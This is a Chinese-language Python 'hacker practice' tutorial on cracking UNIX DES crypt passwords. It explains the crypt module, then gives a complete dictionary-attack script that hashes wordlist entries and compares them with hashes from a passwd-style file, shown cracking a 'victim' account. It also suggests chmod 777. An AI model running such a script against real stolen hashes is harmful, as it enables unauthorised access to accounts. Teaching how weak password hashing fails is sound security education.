Python 黑客 实战:UNIX口令破解机
使用的系统:Ubuntu 14.04 LTS
Python语言版本:Python 2.7.10 V
crypt
库是Python内置的库。在UNIX系统使用,使用crypt()
函数对密码进行加密。UNIX Crypt 函数计算的加密口令为:crypt('egg', 'HX') = HX9LLTdc/jiDE
。
$ python
Python 2.7.6 (default, Jun 22 2015, 18:00:18)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> help('crypt')
输出:
Help on module crypt:
NAME
crypt
FILE
/usr/lib/python2.7/lib-dynload/crypt.i386-linux-gnu.so
MODULE DOCS
http://docs.python.org/library/crypt
FUNCTIONS
crypt(...)
crypt(word, salt) -> string
word will usually be a user's password. salt is a 2-character string
which will be used to select one of 4096 variations of DES. The characters
in salt must be either ".", "/", or an alphanumeric character. Returns
the hashed password as a string, which will be composed of characters from
the same alphabet as the salt.
(END)
按q退出。
我们来试试这个crypt()
函数:
>>> import crypt
>>> crypt.crypt("egg", "HX")
'HX9LLTdc/jiDE'
>>>
程序设计思路
黑客穷举了字典中所有单词,并用Unix crypt() 函数对它们加密,然后将结果偷来的加密密码进行对比。
这就是:字典攻击法 ,来破解加密的口令。
程序编写
你可以在这里下载源代码: 1-4-2-passwdCrack.py
源代码讲解:
import crypt
def testPass(cryptPass):
salt = cryptPass[0:2]
dictFile = open('dictionary.txt', 'r')
for word in dictFile.readlines():
word = word.strip('\n')
cryptWord = crypt.crypt(word, salt)
if cryptWord == cryptPass:
print '[+] Found Password: ' + word + '\n'
return
print '[-] Password Not Found.\n'
return
def main():
passFile = open('passwords.txt')
for line in passFile.readlines():
if ':' in line:
user = line.split(':')[0]
cryptPass = line.split(':')[1].strip(' ')
print '[*] Cracking Password For: ' + user
testPass(cryptPass)
if __name__ == '__main__':
main()
代码中读取的 ‘passwords.txt’ 和 ‘dictionary.txt’ 文件在这里可以下载。
添加可执行权限:
sudo chmod 777 1-4-2-passwdCrack.py
运行脚本:
$ ./1-4-2-passwdCrack.py
[*] Cracking Password For: victim
[+] Found Password: egg
[*] Cracking Password For: root
[-] Password Not Found.
从输出结果可以看出:我成功破解了victim用户的密码。root的密码我们没有成功。那么这表明:root 一定是使用了我们字典( ‘dictionary.txt’ 文件)之外的单词作为密码。没事,我们现在学习了这一种破解方法(字典攻击法),后面我们会学习更多的破解方法。